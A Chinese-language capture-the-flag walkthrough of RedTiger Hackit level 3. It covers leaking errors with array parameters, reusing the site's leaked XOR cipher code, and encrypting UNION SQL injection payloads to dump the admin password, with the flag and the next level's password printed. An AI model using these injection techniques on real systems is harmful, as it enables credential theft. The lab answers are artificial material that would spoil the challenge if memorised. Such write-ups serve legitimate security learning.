Level 3

Writeup

• https://redtiger.labs.overthewire.org/level3.php
• 找出錯誤訊息，在參數後面加上[]：user[]=%60&password[]=%60&login=Login
  • Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /var/www/html/hackit/level3.php on line 97
  • 但沒什麼用
• 從給的線索TheCow和Admin，有另個參數usr，同樣在後面加上[]：https://redtiger.labs.overthewire.org/level3.php?usr[]=MDQyMjExMDE0MTgyMTQw
• 得到：Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

• 下載：https://redtiger.labs.overthewire.org/urlcrypt.inc

  <?php
      // warning! ugly code ahead :)
      function encrypt($str)
      {
          $cryptedstr = "";
          srand(3284724);
          for ($i =0; $i < strlen($str); $i++)
          {
              $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
  
              while(strlen($temp)<3)
              {
                  $temp = "0".$temp;
              }
              $cryptedstr .= $temp. "";
          }
          return base64_encode($cryptedstr);
      }
      function decrypt ($str)
      {
          srand(3284724);
          if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
          {
              $str = base64_decode($str);
              if ($str != "" && $str != null && $str != false)
              {
                  $decStr = "";
                  for ($i=0; $i < strlen($str); $i+=3)
                  {
                      $array[$i/3] = substr($str,$i,3);
                  }
                  foreach($array as $s)
                  {
                      $a = $s ^ rand(0, 255);
                      $decStr .= chr($a);
                  }
                  return $decStr;
              }
              return false;
          }
          return false;
      }
  ?>
  

• 從原始碼得知是在做usr參數的加解密，我們只需要加密的部份，並加上output

  #!/usr/bin/php
  <?php
      // warning! ugly code ahead :)
      function encrypt($str)
      {
          $cryptedstr = "";
          srand(3284724);
          for ($i =0; $i < strlen($str); $i++)
          {
              $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
  
              while(strlen($temp)<3)
              {
                  $temp = "0".$temp;
              }
              $cryptedstr .= $temp. "";
          }
          return base64_encode($cryptedstr);
      }
      echo encrypt($argv[1])."\n";              // <--- output
  ?>
  

• 接著就對usr參數做一般的SQLi，[]不必再加，並且輸入要使用加密過後的值
• 當注入到7時，出現table表格：' union select 1,2,3,4,5,6,7#
• 最後payload：' union select 1,username,3,4,5,password,7 from level3_users where username='Admin'#
• 加密過後：MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1MTE0MjIz
• 最後得到：

  Show userdetails:
  Username:   Admin
  First name: thisisaverysecurepasswordEEE5rt
  Name:       7
  ICQ:        5
  Email:      4
  

• 登入後得到：

  Login correct. You are admin :);
  
  You can raise your wechall.net score with this flag: a707b245a60d570d25a0449c2a516eca
  
  The password for the next level is: there_is_no_bug